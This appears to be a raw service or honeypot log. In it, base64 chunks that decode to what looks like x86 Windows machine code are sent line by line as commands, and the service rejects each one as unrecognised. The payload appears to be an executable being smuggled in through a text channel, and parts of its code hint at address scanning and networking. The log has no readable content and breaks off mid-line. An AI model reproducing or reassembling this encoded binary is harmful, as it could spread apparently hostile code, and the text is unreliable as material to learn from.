**** Command 'wvnrfwohagqnhxj///9qbvdomq4aaipeedldghqf/3uy6wvo5dvjai2fepr//1done4aait1' not recognized. >>>> CFlZjYV0/v//VlDoik4AAP91DI2FdP7//1Doi04AAIPEEDldFHQT/3UUjYVw/f//UOhkTgAA **** Command 'cflzjyv0/v//vldoik4aap91di2fdp7//1doi04aaipeedldfhqt/3uujyvw/f//uohktgaa' not recognized. >>>> WVnrImoBaNwBQQDoQ1YAAGoCmVn3+Y2FcP3//1JQ6FIZAACDxBA5HfA4SQB0HmoBU+gdVgAA **** Command 'wvnrimobanwbqqdoq1yaagocmvn3+y2fcp3//1jq6fizaacdxba5hfa4sqb0hmobu+gdvgaa' not recognized. >>>> agKZWff5jYVw/f//UlDoLBkAAIPEEI2FdP7//1Do/E4AAIC8BXP+//9cjYQFc/7//1l1AogY **** Command 'agkzwff5jyvw/f//uldolbkaaipeei2fdp7//1do/e4aaic8bxp+//9cjyqfc/7//1l1aogy' not recognized. >>>> gL1w/f//XHQTjYV0/v//aETwQABQ6O5NAABZWY2FcP3//1CNhXT+//9Q6NlNAABZjYV0/v// **** Command 'gl1w/f//xhqtjyv0/v//aetwqabq6o5naabzwy2fcp3//1cnhxt+//9q6nlnaabzjyv0/v//' not recognized. >>>> WVNQjYV4+v//UP8VfNBAAIXAD4RlAQAA6JRVAABqBZlZ9/mF0nQi6IVVAACZuQAoAAD3+Y2F **** Command 'wvnqjyv4+v//up8vfnbaaixad4rlaqaa6jrvaabqbzlz9/mf0nqi6ivvaaczuqaoaad3+y2f' not recognized. >>>> dP7//4HCgFABAFJQ6JkWAABZWWh6IgAAjYUg0v//aMDwQABQ6BNSAACNhSDS//+InTTi//9Q **** Command 'dp7//4hcgfabafjq6jkwaabzwwh6igaajyug0v//amdwqabq6bnsaacnhsds//+intti//9q' not recognized. >>>> jYV0/v//UOj/LAAAjYV0/v//UOgQKwAAg8QYOR3wOEkAD4XqAAAAjUX8UI1F3FD/FWTQQACN **** Command 'jyv0/v//uoj/laaajyv0/v//uogqkwaag8qyor3woekad4xqaaaajux8ui1f3fd/fwtqqacn' not recognized. >>>> RdxQjUYCUOjkngAAWYXAWQ+ExQAAAGoCU1aLNQDQQAD/1ov4O/t1CTldHA+EqgAAAFNTU1ON **** Command 'rdxqjuycuojkngaawyxawq+exqaaagocu1alnqdqqad/1ov4o/t1ctldha+eqgaaafntu1on' not recognized. >>>> hXT+//9TUFNqA2gQAQAAjYV4////U1CNhXj///9QV/8VSNBAAFeLPUDQQAD/12oBU/91CP/W **** Command 'hxt+//9tufnqa2gqaqaajyv4////u1cnhxj///9qv/8vsnbaafelpudqqad/12obu/91cp/w' not recognized. >>>> i/CNhXj///9qEFBW/xU40EAAU1NQiUUQ/xUk0EAA/3UQiUUY/9dW/9c5XRgPhWUBAAC6gQAA **** Command 'i/cnhxj///9qefbw/xu40eaau1nqiuuq/xuk0eaa/3uqiuuy/9dw/9c5xrgphwubaac6gqaa' not recognized. >>>> ADPAi8qNvab2//9miZ2k9v//ZomdnPT///OrZquLyjPAjb2e9P//OR0EOUkA86uJXRCJXRhm **** Command 'adpai8qnvab2//9miz2k9v//zomdnpt///orzqulyjpajb2e9p//or0eouka86ujxrcjxrhm' not recognized. >>>> q3UHM8DpJAEAAItFDIA4XHUHx0UYAQAAAL8EAQAAjYWk9v//V4s1eNBAAFBq//91CGoBU//W **** Command 'q3uhm8dpjaeaaitfdia4xhuhx0uyaqaaal8eaqaajywk9v//v4s1enbaafbq//91cgobu//w' not recognized. >>>> i00MjYWc9P//V1CLRRhq/wPBUGoBU//WjUUQUI2FnPT//2oCUI2FpPb//1D/FQQ5SQCFwA+F **** Command 'i00mjywc9p//v1clrrhq/wpbugobu//wjuuqui2fnpt//2ocui2fppb//1d/fqq5sqcfwa+f' not recognized. >>>> uwAAAFNTjYV8+///V1CLRRBq/4idfPv///9wGFNT/xWg0EAAjUUUUGgCAACA/3UI/xUc0EAA **** Command 'uwaaafntjyv8+///v1clrrbq/4idfpv///9wgfnt/xwg0eaajuuuuggcaaca/3ui/xuc0eaa' not recognized. >>>> hcB1d42FrPj//2oDUOgnEQAAjYV8+///aETwQABQ6JNLAACNhXD9//9QjYV8+///UOiASwAA **** Command 'hcb1d42frpj//2oduogneqaajyv8+///aetwqabq6jnlaacnhxd9//9qjyv8+///uoiaswaa' not recognized. >>>> jYV0+f//U1BTjYV8+///U1CInXT5///ov0wAAI2FfPv//1CNhXT5//9QjYWs+P//UP91FOgy **** Command 'jyv0+f//u1btjyv8+///u1cinxt5///ov0waai2ffpv//1cnhxt5//9qjyws+p//up91fogy' not recognized. >>>> GgAAg8Q8/3UU/xVc0EAAoQw5SQA7w3QF/3UQ/9BqAVhfXlvJw1WL7ItFFFNWi/FXM9v/dQiJ **** Command 'ggaag8q8/3uu/xvc0eaaoqw5sqa7w3qf/3uq/9bqavhfxlvjw1wl7itfffnwi/fxm9v/dqij' not recognized. >>>> RhiNRhyJHlCJXgzo9EoAAIt9EGaLRQxXZomGnAEAAGbHhp4BAAAZAOgWUwAAg8QMO8OJRgR1 **** Command 'rhinrhyjhlcjxgzo9eoaait9egalrqxxzomgnaeaagbhhp4baaazaogwuwaag8qmo8ojrgr1' not recognized. >>>> DMeGpAEAAAIAAIDrY1fo+lIAADvDWYlGEHTmV1P/dgSJfgiJfhToQ0oAAFdT/3YQ6DlKAACD **** Command 'dmegpaeaaaiaaidry1fo+liaadvdwylgehtmv1p/dgsjfgijfhtoq0oaafdt/3yq6dlkaacd' not recognized. >>>> xBiNjqABAACJnqQBAACJnqgBAABqAWoB/3UMiZ6sAQAAiJ4cAQAA6D4FAACFwHUOx4akAQAA **** Command 'xbinjqabaacjnqqbaacjnqgbaabqawob/3umiz6saqaaij4caqaa6d4faacfwhuox4akaqaa' not recognized. >>>> BQAAgDPA6xA5Xgx0CDkedARqAesCagJYX15bXcIQAFaL8VeLRgSFwHQHUOjNTgAAWYtGEIXA **** Command 'bqaagdpa6xa5xgx0cdkedarqaescagjyx15bxciqafal8velrgsfwhqhuojntgaawytgeixa' not recognized. >>>> dAdQ6L9OAABZjb6gAQAAagBqBmhI8EAAi8/ojAUAAIvP6MEFAACFwHT1g/gBdRBo3QAAAIvO **** Command 'dadq6l9oaabzjb6gaqaaagbqbmhi8eaai8/ojauaaivp6mefaacfwht1g/gbdrbo3qaaaivo' not recognized. >>>> 6NUCAACL8OsDagFei8/okAUAAIvGX17DVovxV2aLhpwBAACNvqABAABQjUYcUIvP6N0EAACF **** Command '6nucaacl8osdagfei8/okauaaivgx17dvovxv2alhpwbaacnvqabaabqjuycuivp6n0eaacf' not recognized. >>>> wHUNuAEAAICJhqQBAADrK4vP6GQFAACFwHT1g/gBdQ5o3AAAAIvO6HgCAADrDWoBx4akAQAA **** Command 'whunuaeaaicjhqqbaadrk4vp6gqfaacfwht1g/gbdq5o3aaaaivo6hgcaadrdwobx4akaqaa' not recognized. >>>> AwAAgFhfXsNVi+yB7AQBAABTVovxV42GHAEAAFCNhfz+//9oYPBAAFDopU0AAIPEDI2F/P7/ **** Command 'awaagfhfxsnvi+yb7aqbaabtvovxv42ghaeaafcnhfz+//9oypbaafdopu0aaipedi2f/p7/' not recognized. >>>> /42+oAEAAGoAUOg1SgAAWVCNhfz+//9Qi8/otAQAAIvP6OkEAACFwHT1g/gBD4WdAAAAu/oA **** Command '/42+oaeaagoauog1sgaawvcnhfz+//9qi8/otaqaaivp6okeaacfwht1g/gbd4wdaaaau/oa' not recognized. >>>> AACLzlPo+AEAAIXAD4WVAAAAi87olQAAAIXAD4WGAAAAIUX8OQaLfgR2IVeLzug1AQAAhcB1 **** Command 'aaclzlpo+aeaaixad4wvaaaai87olqaaaixad4wgaaaaiux8oqalfgr2ivelzug1aqaahcb1' not recognized. >>>> cFfo0UkAAP9F/I18BwGLRfxZOwZy32oAjb6gAQAAagdoWPBAAIvP6DsEAABoYgEAAIvO6JQB **** Command 'cffo0ukaap9f/i18bwglrfxzowzy32oajb6gaqaaagdowpbaaivp6dseaaboygeaaivo6jqb' not recognized. >>>> AACFwHU1UIvP/3UM/3UI6B0EAABqAGoFaFDwQACLz+gNBAAAU4vO6GoBAADrDWoBx4akAQAA **** Command 'aacfwhu1uivp/3um/3ui6b0eaabqagofafdwqaclz+gnbaaau4vo6gobaadrdwobx4akaqaa' not recognized. >>>> AwAAgFhfXlvJwggAU1aL8YtGFIPAZFDon1AAAIvYWYXbdQhqAljpmAAAAFVXaHDwQABT6ERI **** Command 'awaagfhfxlvjwggau1al8ytgfipazfdon1aaaivywyxbdqhqaljpmaaaafvxahdwqabt6eri' not recognized. >>>> AACLfhAz7TluDFlZdiVXU+hBSAAAaDjwQABT6DZIAABX6BBJAACDxBRFO24MjXwHAXLbaGzw **** Command 'aaclfhaz7tludflzdivxu+hbsaaaadjwqabt6dziaabx6bbjaacdxbrfo24mjxwhaxlbagzw' not recognized. >>>> QABT6BhIAABZjb6gAQAAWWoAU+joSAAAWVBTi8/obQMAAIvP6KIDAACL6IXtdPNT6HZMAABZ **** Command 'qabt6bhiaabzjb6gaqaawwoau+josaaawvbti8/obqmaaivp6kidaacl6ixtdpnt6hzmaabz' not recognized. >>>> agFYXzvoXXUOaPoAAACLzuipAAAA6wrHhqQBAAADAACAXlvDU1b/dCQMi9nomUgAAIPAZFDo **** Command 'agfyxzvoxxuoapoaaaclzuipaaaa6wrhhqqbaaadaacaxlvdu1b/dcqmi9nomugaaipazfdo' not recognized. >>>> 308AAIvwWYX2WXUFagJY63JVV2iA8EAAVuiGRwAA/3QkHFbojEcAAGhs8EAAVuiBRwAAg8QY **** Command '308aaivwwyx2wxufagjy63jvv2ia8eaavuigrwaa/3qkhfbojecaaghs8eaavuibrwaag8qy' not recognized. >>>> jbugAQAAagBW6FBIAABZUFaLz+jVAgAAi8/oCgMAAIvohe1081bo3ksAAFlqAVhfO+hddQ5o **** Command 'jbugaqaaagbw6fbiaabzufalz+jvagaai8/ocgmaaivohe1081bo3ksaaflqavhfo+hddq5o' not recognized. >>>> +gAAAIvL6BEAAADrCseDpAEAAAMAAIBeW8IEAFWL7IHsBAQAAFaL8VdqAI2+oAEAAI2F/Pv/ **** Command '+gaaaivl6beaaadrcsedpaeaaamaaibew8ieafwl7ihsbaqaafal8vdqai2+oaeaai2f/pv/' not recognized. >>>> /2gABAAAUIvP6IoCAACLz+ioAgAAhcB09YP4AXVAjUX8UI2F/Pv//2iM8EAAUOgcTwAAi0UI **** Command '/2gabaaauivp6iocaaclz+ioagaahcb09yp4axvajux8ui2f/pv//2im8eaauogctwaai0ui' not recognized. >>>> i038g8QMO8F0GseGpAEAAAQAAICJjqgBAACJhqwBAABqAusQM8DrDceGpAEAAAMAAIBqAVhf **** Command 'i038g8qmo8f0gsegpaeaaaqaaicjjqgbaacjhqwbaabqausqm8drdcegpaeaaamaaibqavhf' not recognized. >>>> XsnCBAD/dCQEgcEcAQAAUeiBRgAAWVnCBABVi+xRU1ZXi/H/dQiLfhDoWEcAAINl/ACDfgwA **** Command 'xsncbad/dcqegcecaqaaueibrgaawvncbabvi+xru1zxi/h/dqilfhdowecaainl/acdfgwa' not recognized. >>>> WYvYdhZX6EVHAAD/RfyNfAcBi0X8WTtGDHLqK14Qi0YUA9872HZOi04YA8FQiUYU6GpOAACL **** Command 'wyvydhzx6evhaad/rfynfacbi0x8wttgdhlqk14qi0yua9872hzoi04ya8fqiuyu6gpoaacl' not recognized. >>>> 2FmF23UMx4akAQAAAgAAgOs+/3YUagBT6K1FAACLRhCLzyvIUVBT6I5OAACLRhBQK/jojkoA **** Command '2fmf23umx4akaqaaagaagos+/3yuagbt6k1faaclrhclzyviuvbt6i5oaaclrhbqk/jojkoa' not recognized. >>>> AIPEHIleEAP7/3UIV+jiRQAA/0YMi0YMWVlfXlvJwgQAVYvsUVNWV4vx/3UIi34E6K9GAACD **** Command 'aipehileeap7/3uiv+jirqaa/0ymi0ymwvlfxlvjwgqavyvsuvnwv4vx/3uii34e6k9gaacd' not recognized. >>>> ZfwAgz4AWYvYdhVX6J1GAAD/RfyNfAcBi0X8WTsGcusrXgSLRggD3zvYdk6LThgDwVCJRgjo **** Command 'zfwagz4awyvydhvx6j1gaad/rfynfacbi0x8wtsgcusrxgslrggd3zvydk6lthgdwvcjrgjo' not recognized. >>>> w00AAIvYWYXbdQzHhqQBAAACAACA6zz/dghqAFPoBkUAAItGBIvPK8hRUFPo500AAItGBFAr **** Command 'w00aaivywyxbdqzhhqqbaaacaaca6zz/dghqafpobkuaaitgbivpk8hrufpo500aaitgbfar' not recognized. >>>> +OjnSQAAg8QciV4EA/v/dQhX6DtFAAD/BosGWVlfXlvJwgQAVYvsgeyQAQAAU1ZqAY2FcP7/ **** Command '+ojnsqaag8qciv4ea/v/dqhx6dtfaad/bosgwvlfxlvjwgqavyvsgeyqaqaau1zqay2fcp7/' not recognized. >>>> /1uL8VBqAv8V4NFAAA+/RQxISHUDagJbD7/DagZQagL/FeTRQAAzyYP4/4kGXg+VwYvBW8nC **** Command '/1ul8vbqav8v4nfaaa+/rqxishudagjbd7/dagzqagl/fetrqaazyyp4/4kgxg+vwyvbw8nc' not recognized. >>>> DABVi+yD7BBWi/H/dQz/FdTRQABmiUXyjUUMUIvO/3UIZsdF8AIA6HkAAACLRQxqEIhF9IpF **** Command 'dabvi+yd7bbwi/h/dqz/fdtrqabmiuxyjuumuivo/3uizsdf8aia6hkaaaclrqxqeihf9ipf' not recognized. >>>> DohF9opFD4hl9YhF941F8FD/Nv8V2NFAAIXAXnQK/xXc0UAAM8DrA2oBWMnCCAD/dCQM/3Qk **** Command 'dohf9opfd4hl9yhf941f8fd/nv8v2nfaaixaxnqk/xxc0uaam8dra2obwmnccad/dcqm/3qk' not recognized. >>>> DP90JAz/Mf8V0NFAAMIMAP90JAz/dCQM/3QkDP8x/xXM0UAAwgwA/zH/FcTRQAD/JcjRQABq **** Command 'dp90jaz/mf8v0nfaamimap90jaz/dcqm/3qkdp8x/xxm0uaawgwa/zh/fctrqad/jcjrqabq' not recognized. >>>> AVjDVYvsUVFTVleLfQhqATP2W4lN+FeJdfzoFUUAAIXAWX4sigQ+PC51Bf9F/OsKPDB8BDw5 **** Command 'avjdvyvsuvftvlelfqhqatp2w4ln+fejdfzofuuaaixawx4sigq+pc51bf9f/oskpdb8bdw5' not recognized. >>>> fgIz21dG6PNEAAA78Fl83oXbdBiDffwDdAQzwOs6/3UMi034V+g1AAAA6ylX/xXA0UAAi/D/ **** Command 'fgiz21dg6pneaaa78fl83oxbdbidffwddaqzwos6/3umi034v+g1aaaa6ylx/xxa0uaai/d/' not recognized. >>>> FdzRQACF9nQWM8CLTgyLVQyLCYoMAYgMEECD+AR87GoBWF9eW8nCCABVi+xRU4tdCFYz9leJ **** Command 'fdzrqacf9nqwm8cltgylvqylcyomaygmeecd+ar87gobwf9ew8nccabvi+xru4tdcfyz9lej' not recognized. >>>> dfyNRQiNPB5QaIzwQABX6NtLAACLVQyLRfyKTQiDxAyD+AOIDBB0F0aAPy50CIoEHkY8LnX4 **** Command 'dfynrqinpb5qaizwqabx6ntlaaclvqylrfyktqidxayd+aoidbb0f0aapy50cioehky8lnx4' not recognized. >>>> /0X8g338BHzDX15bycIIAFWL7FFTVlf/dQzoPUQAAIt1CItdEFmJRfxW6C1EAACL+FmF/3Qt **** Command '/0x8g338bhzdx15byciiafwl7fftvlf/dqzopuqaait1citdefmjrfxw6c1eaacl+fmf/3qt' not recognized. >>>> hdt0CYvGK0UIO8N9IIN9FAB0D/91DFbo6pQAAFmFwFl0Bo10PgHry4PI/+syi038i8YrRQiN **** Command 'hdt0cyvgk0uio8n9iin9fab0d/91dfbo6pqaafmfwfl0bo10pghry4pi/+syi038i8yrrqin' not recognized. >>>> RAgCO8N+CIXbdAQzwOsa/3UMVujoQgAAVujSQwAAg8QMgGQwAQBqAVhfXlvJw1aLdCQIVzP/ **** Command 'ragco8n+cixbdaqzwosa/3umvujoqgaavujsqwaag8qmggqwaqbqavhfxlvjw1aldcqivzp/' not recognized. >>>> OXwkEH4dVuiuQwAAhcBZdBJW6KNDAABHWTt8JBCNdAYBfOOLxl9ew1aLdCQIVzP/VuiEQwAA **** Command 'oxwkeh4dvuiuqwaahcbzdbjw6kndaabhwtt8jbcndaybfoolxl9ew1aldcqivzp/vuieqwaa' not recognized. >>>> hcBZdBqDfCQQAHQMi84rTCQMO0wkEH0HjXQGAUfr24vHX17DVYvsUVOLXQhWi3UMV2oAU4l1 **** Command 'hcbzdbqdfcqqahqmi84rtcqmo0wkeh0hjxqgaufr24vhx17dvyvsuvolxqhwi3umv2oau4l1' not recognized. >>>> /Oi2////i/hZhf9ZfwczwOmVAAAAhfZ9D2oA6KQSAAAz0ln394lV/I1HAlBT6Fr///+L8Cvz **** Command '/oi2////i/hzhf9zfwczwomvaaaahfz9d2oa6kqsaaaz0ln394lv/i1halbt6fr///+l8cvz' not recognized. >>>> 0eZW6F9KAABWM/ZWUIlFDOizQQAAg8QYhf9+JDt1/HQaagH/dRBWU+gp////WVlQ/3UM6JT+ **** Command '0ezw6f9kaabwm/zwuilfdoizqqaag8qyhf9+jdt1/hqaagh/drbwu+gp////wvlq/3um6jt+' not recognized. >>>> //+DxBBGO/d83DP2Tzv+iTN+H2oB/3UQVv91DOj//v//WVlQU+hs/v//g8QQRjv3fOH/dQzo **** Command '//+dxbbgo/d83dp2tzv+itn+h2ob/3uqvv91doj//v//wvlqu+hs/v//g8qqrjv3foh/dqzo' not recognized. >>>> U0YAAFlqAVhfXlvJw1ZXM/+L92oA994b9oHm+AAAAIPGCOj7EQAAM9JZ9/aLRCQMA8eE0ogQ **** Command 'u0yaaflqavhfxlvjw1zxm/+l92oa994b9ohm+aaaaipgcoj7eqaam9jz9/alrcqma8ee0ogq' not recognized. >>>> dQPGAAFHg/8EfNBfXsNVi+yD7AyLRRCDZfgAg30MAFOKCIpAAVZXiE3+iEX/fjOLRQiLTfgD **** Command 'dqpgaafhg/8efnbfxsnvi+yd7aylrrcdzfgag30mafokcipaavzxie3+iex/fjolrqiltfgd' not recognized. >>>> wYlF9IoAiEUTYIpFE4pN/tLAMkX/iEUTYYtN9IpFE/9F+IgBi0X4O0UMfM1qAVhfXlvJw1WL **** Command 'wylf9ioaieutyipfe4pn/tlamkx/ieutyytn9ipfe/9f+igbi0x4o0umfm1qavhfxlvjw1wl' not recognized. >>>> 7IPsDItFEINl+ACDfQwAU4oIikABVleITf6IRf9+M4tFCItN+APBiUX0igCIRRNgikUTik3+ **** Command '7ipsditfeinl+acdfqwau4oiikabvleitf6irf9+m4tfcitn+apbiux0igcirrngikutik3+' not recognized. >>>> MkX/0siIRRNhi030ikUT/0X4iAGLRfg7RQx8zWoBWF9eW8nDU1ZXM/9X6BsRAABZM9JqGotc **** Command 'mkx/0siirrnhi030ikut/0x4iaglrfg7rqx8zwobwf9ew8ndu1zxm/9x6bsraabzm9jqgotc' not recognized. >>>> JBRZ9/GL8oPGYYP7BHR4g/sBdRVX6PoQAABZM9JqCln38YvCg8Aw62D2wwJ0E1fo4BAAAFkz **** Command 'jbrz9/gl8opgyyp7bhr4g/sbdrvx6poqaabzm9jqcln38yvcg8aw62d2wwj0e1fo4baaafkz' not recognized. >>>> 0moaWffxi/KDxkFX6M0QAACoAVl0GPbDBHQTV+i9EAAAWTPSahpZ9/GL8oPGYVfoqhAAAKgB **** Command '0moawffxi/kdxkfx6m0qaacoavl0gpbdbhqtv+i9eaaawtpsahpz9/gl8opgyvfoqhaaakgb' not recognized. >>>> WXQY9sMBdBNX6JoQAABZM9JqCln38Yvyg8Ywi8ZfXlvDU4tcJAxWV4t8JBiL8zv7fhJqAOhv **** Command 'wxqy9smbdbnx6joqaabzm9jqcln38yvyg8ywi8zfxlvdu4tcjaxwv4t8jbil8zv7fhjqaohv' not recognized. >>>> EAAAK/sz0vf3WYvyA/OLXCQQM/+F9n4S/3QkHOgr////iAQfRzv+WXzuagLoG////1mIA4Ak **** Command 'eaaak/sz0vf3wyvya/olxcqqm/+f9n4s/3qkhogr////iaqfrzv+wxzuaglog////1mia4ak' not recognized. >>>> HwBqAVhfXlvDVle/kPBAADP2V+iuQAAAhcBZfhiKRCQMOoaQ8EAAdBFXRuiWQAAAO/BZfOgz **** Command 'hwbqavhfxlvdvle/kpbaadp2v+iuqaaahcbzfhikrcqmooaq8eaadbfxruiwqaaao/bzfogz' not recognized. >>>> wF9ew2oBWOv4U4pcJAhWV4TbfD8PvvNW6EhLAACFwFl1NVboa0sAAIXAWXUqv5jwQAAz9lfo **** Command 'wf9ew2obwov4u4pcjahwv4tbfd8pvvnw6ehlaacfwfl1nvboa0saaixawxuqv5jwqaaz9lfo' not recognized. >>>> VkAAAIXAWX4UOp6Y8EAAdBBXRuhCQAAAO/BZfOwzwOsDagFYX15bw1aLdCQIigZQ/xVo0EAA **** Command 'vkaaaixawx4uop6y8eaadbbxruhcqaaao/bzfowzwosdagfyx15bw1aldcqiigzq/xvo0eaa' not recognized. >>>> hcB0C4B+AYB2BWoBWF7DM8Bew4tEJASKADyhdAc8o3QDM8DDagFYw1WL7IHs/AcAAItFHFNW **** Command 'hcb0c4b+ayb2bwobwf7dm8bew4tejaskadyhdac8o3qdm8ddagfyw1wl7ihs/acaaitfhfnw' not recognized. >>>> V4t9DDP2iXX8gCcAOXUQiTB/CYtFCEDp3AEAAItdCIoDUOhA////hcBZdVCJXQyDfSAAdCv/ **** Command 'v4t9ddp2ixx8gccaoxuqitb/cytfcedp3aeaaitdcioduoha////hcbzdvcjxqydfsaadcv/' not recognized. >>>> dQzof////4XAWXQN/3UM6JP///+FwFl0Lf91DOiG////hcBZdARG/0UMi0UQRv9FDEg78H0Q **** Command 'dqzof////4xawxqn/3um6jp///+fwfl0lf91doig////hcbzdarg/0umi0uqrv9fdeg78h0q' not recognized. >>>> i0UMigBQ6PD+//+FwFl0s4tFEEg78IlFDA+NagEAAIoEHlDo0/7//4XAWQ+EvgAAAIoEHlDo **** Command 'i0umigbq6pd+//+fwfl0s4tfeeg78ilfda+nageaaioehldo0/7//4xawq+evgaaaioehldo' not recognized. >>>> i/7//4XAWXULRjt1DHzs6T8BAACKBB5Q6Kj+//+FwFl0G4tN/IoEHv9F/EY7dQyIBDl9CYtF **** Command 'i/7//4xawxulrjt1dhzs6t8baackbb5q6kj+//+fwfl0g4tn/ioehv9f/ey7dqyibdl9cytf' not recognized. >>>> GEg5Rfx814tFGEg5Rfx8HIN9/AB0FotF/IoEOFDoN/7//4XAWXUF/038deqLRfyFwHwEgCQ4 **** Command 'geg5rfx814tfgeg5rfx8hin9/ab0fotf/ioeofdon/7//4xawxuf/038deqlrfyfwhwegcq4' not recognized. >>>> ADPbOB90FYoEO1DoE/7//4XAWXQHQ4A8OwB1640EO1CNhQT4//9Q6MQ9AACNhQT4//9QV+i3 **** Command 'adpbob90fyoeo1doe/7//4xawxqhq4a8owb1640eo1cnhqt4//9q6mq9aacnhqt4//9qv+i3' not recognized. >>>> PQAAi0X8g8QQK8M7RRQPjYQAAACLXQiDfSAAD4SKAAAAi0UIgCcAA8Yz21DoR/7//4XAWXRZ **** Command 'pqaai0x8g8qqk8m7rrqpjyqaaaclxqidfsaad4skaaaai0uigccaa8yz21dor/7//4xawxrz' not recognized. >>>> i0UQg8D+iUUgi0UIA8aJRRD/dRDoSv7//4XAWXUZi0UQigiIDDuKSAFDRkCIDDtDRkCJRRDr **** Command 'i0uqg8d+iuugi0uia8ajrrd/drdosv7//4xawxuzi0uqigiidduksafdrkciddtdrkcjrrdr' not recognized. >>>> BkZGg0UQAjt1IH0Xi0UYg8D+O9h9Df91EOju/f//hcBZdbiAJDsAO10UfBCLRRzHAAEAAACL **** Command 'bkzgg0uqajt1ih0xi0uyg8d+o9h9df91eoju/f//hcbzdbiajdsao10ufbclrrzhaaeaaacl' not recognized. >>>> RQgDxusMi10Ii0UcgyAAjQQeX15bycNVi+y4HBAAAOgERQAAU1ZXjU3k6OTc//+LfQyNRfhq **** Command 'rqgdxusmi10ii0ucgyaajqqex15bycnvi+y4hbaaaogerqaau1zxju3k6otc//+lfqynrfhq' not recognized. >>>> AVD/dQgz241N5Igf6M/c//+L8DvzD4QrAQAAi1X4g/oKD4IXAQAAiJ3k7///iV38/3UYjU38 **** Command 'avd/dqgz241n5igf6m/c//+l8dvzd4qraqaai1x4g/okd4ixaqaaij3k7///iv38/3uyju38' not recognized. >>>> Uf91FP91EFJXUOiR/f//i034g8Qci9Er0APWg/oFD47iAAAAOV38dNGJXQgz//91GI1V/CvI **** Command 'uf91fp91efjxuoir/f//i034g8qci9er0apwg/ofd47iaaaaov38dngjxqgz//91gi1v/cvi' not recognized. >>>> UgPO/3UU/3UQUY2N5O///1FQ6FP9//+DxBw5Xfx0A/9FCItN+IvRK9AD1oP6BXYJR4H/ECcA **** Command 'ugpo/3uu/3uquy2n5o///1fq6fp9//+dxbw5xfx0a/9fcitn+ivrk9ad1op6bxyjr4h/ecca' not recognized. >>>> AHy/OV0IdBFT6JgMAAAz0ln394tN+IlVCIv+iV30/3UYjUX8K89QA87/dRSNheTv////dRBR **** Command 'ahy/ov0idbft6jgmaaaz0ln394tn+ilvciv+iv30/3uyjux8k89qa87/drsnhetv////drbr' not recognized. >>>> UFfo9/z//4PEHDld/Iv4dBk5XQh0Lv9NCI2F5O///1D/dQzo4jsAAFlZi034i8ErxwPGg/gF **** Command 'uffo9/z//4pehdld/iv4dbk5xqh0lv9nci2f5o///1d/dqzo4jsaaflzi034i8erxwpgg/gf' not recognized. >>>> dgz/RfSBffQQJwAAfKSNTeTodtz///91DOimPAAAWTPJO0UQD53Bi8FfXlvJw4gfjU3k6FTc **** Command 'dgz/rfsbffqqjwaafksntetodtz///91doimpaaawtpjo0uqd53bi8ffxlvjw4gfju3k6ftc' not recognized. >>>> //8zwOvtVYvsi1UMUzPbVoXSdAIgGotFEIXAdAOAIACLdQiAPkB0HFeL+ovGK/6KCITJdA6F **** Command '//8zwovtvyvsi1umuzpbvoxsdaiggotfeixadaoaiacldqiapkb0hfel+ovgk/6kcitjda6f' not recognized. >>>> 0nQDiAwHQ0CAOEB17F+F0nQEgCQTAIA8MwCNBDNeW3UEM8Bdw4N9EAB0C1D/dRDoNDsAAFlZ **** Command '0nqdiawhq0caoeb17f+f0nqegcqtaia8mwcnbdnew3uem8bdw4n9eab0c1d/drdondsaaflz' not recognized. >>>> agFYXcNVi+xRU4pdCFZXvqTwQACNffxmpYD7IKR+NID7fn0vD77zVujKRgAAhcBZdShW6O1G **** Command 'agfyxcnvi+xru4pdcfzxvqtwqacnffxmpyd7ikr+nid7fn0vd77zvujkrgaahcbzdshw6o1g' not recognized. >>>> AACFwFl1HYD7QHQYgPsudBM6XAX8dA1Ag/gCfPQzwF9eW8nDagFY6/b/dCQE6J3///9Zw1WL **** Command 'aacfwfl1hyd7qhqygpsudbm6xax8da1ag/gcfpqzwf9ew8ndagfy6/b/dcqe6j3///9zw1wl' not recognized. >>>> 7LgAIAAA6MtCAAD/dQiNhQDg//9Q6Kw6AAD/dQyNhQDw//9Q6J06AACNhQDg//9Q6O2MAACN **** Command '7lgaiaaa6mtcaad/dqinhqdg//9q6kw6aad/dqynhqdw//9q6j06aacnhqdg//9q6o2maacn' not recognized. >>>> hQDw//9Q6OGMAACNhQDw//9QjYUA4P//UOjCRgAAg8QgycNWvlICQQBW/3QkDOhdOgAA/3Qk **** Command 'hqdw//9q6ogmaacnhqdw//9qjyua4p//uojcrgaag8qgycnwvlicqqbw/3qkdohdogaa/3qk' not recognized. >>>> FFbogff//1D/dCQc6Fk6AACDxBhew1OLXCQIVldT6Cc7AACL+FmD/wR8JIP/DH8fM/aF/34U **** Command 'ffbogff//1d/dcqc6fk6aacdxbhew1olxcqivldt6cc7aacl+fmd/wr8jip/dh8fm/af/34u' not recognized. >>>> D74EHlDoDUYAAIXAWXQKRjv3fOxqAVjrAjPAX15bw1WL7IHsBAEAAFNWV42F/P7//zP/UFdX **** Command 'd74ehldoduyaaixawxqkrjv3foxqavjrajpax15bw1wl7ihsbaeaafnwv42f/p7//zp/ufdx' not recognized. >>>> V/91COhQOwAAvvwBQQBXVug39///i9iDxBw7334gV1bo9/b//1CNhfz+//9Q6IyLAACDxBCF **** Command 'v/91cohqowaavvwbqqbxvug39///i9idxbw7334gv1bo9/b//1cnhfz+//9q6iylaacdxbcf' not recognized. >>>> wHQnRzv7fOCNhfz+//9owg1BAFDob4sAAPfYG8BZg+BjWYPAnF9eW8nDi8fr91WL7FYz9ldW **** Command 'whqnrzv7focnhfz+//9owg1bafdob4saapfyg8bzg+bjwypanf9ew8ndi8fr91wl7fyz9ldw' not recognized. >>>> aiBqAlZqA2gAAADA/3UI/xX80EAAi/iJdQiD//90Izl1DHQejUUIVlD/dRD/dQxX/xVs0EAA **** Command 'aibqalzqa2gaaada/3ui/xx80eaai/ijdqid//90izl1dhqejuuivld/drd/dqxx/xvs0eaa' not recognized. >>>> V/8VJNFAAGoBWOsCM8BfXl3DVYvsU1dqAGonagNqAGoDaAAAAID/dQj/FfzQQACDZQgAi/iD **** Command 'v/8vjnfaagobwoscm8bfxl3dvyvsu1dqagonagnqagodaaaaaid/dqj/ffzqqacdzqgai/id' not recognized. >>>> y/87+3QdjUUIUFf/FezQQACDfQgAi9h0A4PL/1f/FSTRQACLw19bXcNVi+yD7BSNTezo2tj/ **** Command 'y/87+3qdjuuiuff/fezqqacdfqgai9h0a4pl/1f/fstrqaclw19bxcnvi+yd7bsntezo2tj/' not recognized. >>>> /41F/GoBUI1N7P91COjM2P//hcB0DY1N7Oh62f//agFYycMzwMnDVYvsgewYAQAAVmoEagWN **** Command 